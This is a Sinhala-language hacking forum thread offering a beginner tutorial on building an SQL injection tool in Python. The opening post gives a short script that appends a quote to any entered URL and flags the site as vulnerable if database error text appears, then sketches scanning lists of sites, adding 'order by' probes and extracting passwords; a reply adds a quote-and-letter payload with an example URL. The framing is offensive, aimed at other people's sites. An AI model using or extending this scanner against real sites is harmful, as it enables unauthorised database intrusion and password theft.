ඔබ තවමත් Widane Forums සාමාජිකයෙක් නෙවෙයි ද..?

Widane Forums හි සියළුම ලිපිවල ඇති සියළුම Links වෙත පිවිසීමට නම් ලියාපදිංචිවීම අනිවාර්යයි.
ඔබගේ සියලුම තාක්ෂණික ගැටළු සඳහා විසඳුම් සොගැනීමට වගේම දැනුම බෙදාගැනීම සඳහා මෙහි ඉඩකඩ වෙන්කර තිබෙනවා.
ඉතින් ඇයි තවත් බලාගෙන ඉන්නේ ඉක්මනින් ලියාපදිංචිවී ඔබගේ දැනුම වැඩිකරගන්න.

Register Here




[Tut] developing a Sql injector
#1
අපි පයිතන්වල මූලික දේවල් ඔක්කොම ඉගෙන ගත්තනෙ . දැන් අපි පොඩි පොඩි ටූල් හදලා බලන්න තමා යන්නේ. කලින් ටියුට් එකේ අපි කතා කරා කොහොමද ඇඩ්මින් පැනල් එක හොයන්න කෝඩ් එකක් ලියන්නේ කියලා. දැන් අපි බලමු කොහොමද සයිට් එකක් vulnerable ද නැද්ද කියලා බලන්නේ කියලා. මේක ගොඩාක් සරලයි. අපි ඊලඟ ඒවගෙන් මේක දියුනු කරලා අපිටම කියලා sql injection tool එකක් හදාගන්න පොඩි ට්‍රයි එකක් දීලා බලමු.

අපි මේකට ගන්නේ requests කියන ගොඩාක් ජනප්‍රිය මොඩියුල් එකක්.
මේක sql වලට විතරක් නෙවෙයි xss ,rfi වගේ ගොඩක් දේවල් වලට ගන්න පුලුවන්.ඒවා ඊලඟට බලමු.


import requests

# ph03n1x[at]ukussa.net

url=raw_input("enter the site")

response = requests. get(url + "'"). text

if 'error' in response or 'syntax' in response or
'MySQL error' in response:

print "site is Vulnerable "
else :
print "site is not vulnerable "


හරි ඕක තමා සීන් එක.

මේකෙ අවුල් තැන් ගොඩක් තියෙනවා ඒත් සාමාන්‍යයෙන් වැඩ කරනවා.

අපිට පුලුවන් List එකක් එක්ක for loop එකක් දාලා මේකෙන් සයිට් සෙට් එකක්ම එකවර චෙක් කරලා බලන්න.

තව පුලුවන් මේකෙන් සයිට් එකක් වුලනරබල් කියලා ආවාම ඒකේ url එකට අපි කරනවා වගේ order by ඇඩ් කරලා ආයෙ චෙක් කරන ගමන් ඒකේ unknown column කියලා එනවද බලන්න.
මේ විදිහට දිගට ගිහින් පාස්වර්ඩ් එක ගන්න .

ඒ වගේම අපේ කලින් හදපු කෝඩ් එක (ඇඩ්මින් පේජ් හොයන එක) එකත් එක්ක එකතු කරලා හොඳ ටූල් එකක් හදාගන්න පුලුවන්.
හරි අදහස් කමෙන්ට් එකක් දාගෙන යමන්.

ඊලඟ ටියුට් එකෙන් සෙට් වෙමු.


excessively written for U.F
Ph03n1x
A noob hacker



_ __
_ _| | ___ _ ___ ___ __ _ / _| ___ _ __ _ _ _ __ ___ ___
| | | | |/ / | | / __/ __|/ _` | | |_ / _ \| '__| | | | '_ ` _ \/ __|
| |_| | <| |_| \__ \__ \ (_| | | _| (_) | | | |_| | | | | | \__ \
\__,_|_|\_\\__,_|___/___/\__,_| |_| \___/|_| \__,_|_| |_| |_|___/
B.Sc Engineering Student
gov. university of Pera.
Admin At

[To see links please login or register here]

#2
Elama bng Wink
|+| Knowledge |+| Discipline |+| Patience |+|

Area Master 
(Founder & Info. Sec. Analyst)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries:

[To see links please login or register here]

 
Reply
#3
ඕකට 'a විදිහට දැම්මා නම් හොදයි. මොකද එතකොට ඕක පොඩ්ඩක් ඇඩ්වාන්ස් වෙනවා. අනික දැන් ' වලින් SQL vul අහුවෙන්නෙ අඩුවෙන්

Elite_x 
(Admin & Marketing Officer)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries:

[To see links please login or register here]

 
Reply
#4
ela bro.. Smile
<>
.:: [Induwara Uthsara] :: [රතු කුරුල්ලා] ::.
</>
Reply
#5
(10-28-2018, 02:27 PM)Elite_x Wrote: ඕකට 'a විදිහට දැම්මා නම් හොදයි. මොකද එතකොට ඕක පොඩ්ඩක් ඇඩ්වාන්ස් වෙනවා. අනික දැන් ' වලින් SQL vul අහුවෙන්නෙ අඩුවෙන්

@ Elite
'a විදිහ' qwe mokakda bn?
B.Sc Engineering Student
gov. university of Pera.
Admin At

[To see links please login or register here]

Reply
#6
ela ela
TFS
No any One Safe - Security is a Joke
Reply
#7
ex - https://www.widane.com/alerts.php?id=1'a

Elite_x 
(Admin & Marketing Officer)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries:

[To see links please login or register here]

 
Reply
#8
TFS patta bn
Reply
#9
(03-05-2019, 03:00 AM)Lushion Hydra Wrote: TFS patta bn

Thanks.. wait and watch I'll post  more tuts.
B.Sc Engineering Student
gov. university of Pera.
Admin At

[To see links please login or register here]

Reply
#10
ela bro
Reply




Users browsing this thread: 1 Guest(s)